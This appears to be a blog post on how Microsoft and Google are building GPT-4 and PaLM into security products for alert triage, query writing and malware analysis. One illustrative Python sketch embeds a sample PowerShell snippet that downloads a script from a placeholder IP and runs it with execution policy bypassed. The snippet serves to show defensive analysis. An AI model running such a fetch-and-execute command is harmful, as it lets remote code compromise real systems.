Microsoft and Google Using LLMs for Cybersecurity

Google and Microsoft are integrating their LLMs, PaLM and GPT-4 respectively, into their cybersecurity services.

They basically have two use cases:

1. Better User Interfaces + Analysis Help for Security Analysts

Using the LLM to explain incidents (cyberattacks, or things that might be attacks) in natural language and to answer analysts’ questions in natural language. This is very similar to how one might use an LLM chatbot as a research assistant, except that these systems are given access to all the data within your organization + other Google or Microsoft tools.

Security analysts are constantly beset by “alert fatigue”: they receive so many alerts about things that might be a cyberattack that they can’t handle it all. These LLMs help address that by summarizing and contextualizing the alerts. They can also automatically write queries (formal requests for information) against the network, which is closer to code generation; a rough sketch of what that might look like follows just below.
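To make the query-generation idea a bit more concrete, here is a minimal sketch of turning an analyst’s question into a query. Everything in it is my own illustration: the prompt, the KQL-style output, and the use of the `openai` Python client are assumptions, not how Security Copilot or Sec-PaLM actually works under the hood.

```python
# Hypothetical sketch: asking an LLM to turn an analyst's question into a
# detection query. The prompt and the KQL-style output are illustrative;
# this is not the actual Security Copilot or Sec-PaLM implementation.
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

analyst_question = (
    "Show me all failed sign-ins from outside the US in the last 24 hours, "
    "grouped by user account."
)

response = client.chat.completions.create(
    model="gpt-4",
    messages=[
        {
            "role": "system",
            "content": (
                "You translate analyst questions into KQL queries against the "
                "SigninLogs table. Return only the query."
            ),
        },
        {"role": "user", "content": analyst_question},
    ],
)

print(response.choices[0].message.content)
# Plausible shape of the output (illustrative, not guaranteed):
# SigninLogs
# | where TimeGenerated > ago(24h)
# | where ResultType != "0" and Location != "US"
# | summarize FailedSignIns = count() by UserPrincipalName
```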

Both companies also hope that explaining incidents in natural language will help address the talent shortage of cybersecurity professionals, by helping security analysts with less experience do better analysis.

This parallels how much of the military plans to make use of LLMs: by saving time for human intelligence analysts (CSIS estimates 45 days a year per analyst!).

2. Reverse Engineering to Identify Malware

That is, you can feed it the machine code for a piece of software you think might be malware, and it will tell you what that code does, providing summaries in natural language. This seems like one of the biggest use cases for defenders, since “you can do in minutes what used to take a whole day” (Microsoft tutorial).

Google’s version of this tool is called VirusTotal Code Insight (more documentation here). On a broader level, you don’t have to upload a piece of suspected malware to these tools to get a result; they can continuously scan your network for code that could be malware. In this way, they’re not just a user-interface improvement or a gimmick: they’re the latest step in a long line of malware-detection tools that are central to how enterprises defend themselves. A rough sketch of that workflow follows below.
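As a rough illustration of that workflow (and only an illustration: the “suspicious” script, the prompt, and the model call are my own assumptions, not the internals of Code Insight or Security Copilot), here is what handing a suspicious script to an LLM for triage might look like:

```python
# Hypothetical sketch of LLM-assisted malware triage. The "suspicious" script,
# the prompt, and the model choice are all illustrative; tools like VirusTotal
# Code Insight run this kind of analysis on submitted or scanned files
# automatically, rather than via a hand-written call like this.
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

suspicious_script = r"""
$u = "http://203.0.113.7/update.ps1"   # 203.0.113.0/24 is a documentation-only IP range
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\update.ps1"
powershell -ExecutionPolicy Bypass -File "$env:TEMP\update.ps1"
"""

prompt = (
    "You are a malware analyst. Explain step by step what this script does, "
    "say whether it is likely malicious, and list indicators of compromise "
    "a defender should look for:\n\n" + suspicious_script
)

response = client.chat.completions.create(
    model="gpt-4",
    messages=[{"role": "user", "content": prompt}],
)

print(response.choices[0].message.content)
```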

What does this mean?

Context

Microsoft and Google, among other things, are huge cybersecurity players. So, this is a fairly big deal for the world of cyber.

  • Gmail and Outlook combined make up 68% of the email market. They’re handling security for all that.

  • Google and Microsoft also make up 10% and 23% of the cloud computing market respectively. That’s a hefty chunk of the digital world that must be secured, and customers like to buy their security from the same company that handles their cloud, because it simplifies managing their tech.

  • In 2022, Microsoft made $20 billion in revenue from cybersecurity services (about 10% of its total revenue). It’s hard to know how much Google makes, since its security services are bundled with its cloud offerings.

The Good

For those of us who worry about AI-powered hackers, it’s pretty good that the companies developing powerful AI are also the companies managing a lot of the world’s cybersecurity. They’re incentivized to use advances in AI to make their systems more secure, and, importantly, they’re incentivized not to release an LLM to the public that could hack their own systems.

I’m also hoping that a lot of the security talent at Google and Microsoft gains experience using advanced AI to improve security. When AI gets more powerful, my hope is that 1) AI companies can use their AI to improve their own security, thereby reducing the chance of model weights being stolen and of the number of AGI labs increasing (which affects racing dynamics, etc.), and 2) we gain some time before doom because people + smaller AI systems improved the world’s security enough that the most advanced AI systems couldn’t take over, at least for a little bit. Having more people with experience using AI to improve security is good for both of these.

The Bad

Maybe this accelerates investment in AI just a bit, because cyber is a huge application, but this basically matches my previous expectations around AI in cyber, and I’m not personally updating on this.

Maybe AI in cyber still mainly helps attackers more than defenders. Better phishing attacks, and especially real-time audio deepfakes, are pretty bad considering how many attacks start with social engineering that manipulates humans in exactly that way, and we’re not updating the humans.

Maybe this is less than I expected these companies to be doing with their AI. Like, I’d be excited for Google + Microsoft to use AI to stress-test their own security more: what happens if you make a deepfake of the CEO and call a bunch of Microsoft employees? Can you adapt your security to combat that? As far as I know they’re not doing that, but it’s hard to tell what’s going on inside such big companies.

Other Info

Both companies fine-tuned their LLMs on the massive troves of cyber data they possess.

Both Google’s and Microsoft’s offerings are in preview as of this article. They’re being rolled out to a select number of beta testers before being fully released to all their customers in perhaps 3-4 months.

Microsoft announced its system on March 28; Google announced its system on April 24.

Both companies claim that customer data will not be used to train foundation models.

As far as I can tell, both companies are offering essentially the same services with their LLMs for security, just marketed slightly differently.

Appendix: Quotes from Google + Microsoft

Google

Google is launching a new service called “Google Cloud Security AI Workbench,” built on top of a fine-tuned version of PaLM.

“[Sec-PaLM] is fine-tuned for security use cases, incorporating our unsurpassed security intelligence such as Google’s visibility into the threat landscape and Mandiant’s frontline intelligence on vulnerabilities, malware, threat indicators, and behavioral threat actor profiles.”

Preventing threats from spreading beyond first infection

“We already provide best-in-class capabilities to help organizations immediately respond to threats. But what if we could not just identify and contain initial infections, but also help prevent them from happening anywhere else? With our AI advances, we can now combine world class threat intelligence with point-in-time incident analysis and novel AI-based detections and analytics to help prevent new infections. These advances are critical to help counter a potential surge in adversarial attacks that use machine learning and generative AI systems.

  • VirusTotal Code Insight uses Sec-PaLM to help analyze and explain the behavior of potentially malicious scripts, and will be able to better detect which scripts are actually threats.

  • Mandiant Breach Analytics for Chronicle leverages Google Cloud and Mandiant Threat Intelligence to automatically alert you to active breaches in your environment. It will use Sec-PaLM to help contextualize and respond instantly to these critical findings.”

Reducing toil

“Advances in generative AI can help reduce the number of tools organizations need to secure their vast attack surface areas and ultimately, empower systems to secure themselves. This will minimize the toil it takes to manage multiple environments, to generate security design and capabilities, and to generate security controls. Today, we’re announcing:

  • Assured OSS will use LLMs to help us add even more open-source software (OSS) packages to our OSS vulnerability management solution, which offers the same curated and vulnerability-tested packages that we use at Google.

  • Mandiant Threat Intelligence AI, built on top of Mandiant’s massive threat graph, will leverage Sec-PaLM to quickly find, summarize, and act on threats relevant to your organization.”

Evolving how practitioners do security to close the talent gap

“To help power this evolution, we’re embedding Sec-PaLM-based features that can make security more understandable while helping to improve effectiveness with exciting new capabilities in two of our solutions:

  • Chronicle AI: Chronicle customers will be able to search billions of security events and interact conversationally with the results, ask follow-up questions, and quickly generate detections, all without learning a new syntax or schema.

  • Security Command Center AI: Security Command Center will translate complex attack graphs to human-readable explanations of attack exposure, including impacted assets and recommended mitigations. It will also provide AI-powered risk summaries for security, compliance, and privacy findings for Google Cloud.”

Microsoft

“Security Copilot delivers critical step-by-step guidance and context through a natural language-based investigation experience that accelerates incident investigation and response.”

This basically means that:

“Attackers hide behind noise and weak signals. Defenders can now discover malicious behavior and threat signals that could otherwise go undetected. Security Copilot surfaces prioritized threats in real time and anticipates a threat actor’s next move with continuous reasoning based on Microsoft’s global threat intelligence.”

Final Note:

Any feedback you have on my writing is deeply appreciated. If you think I’m wrong, please let me know! I’m excited for more data.
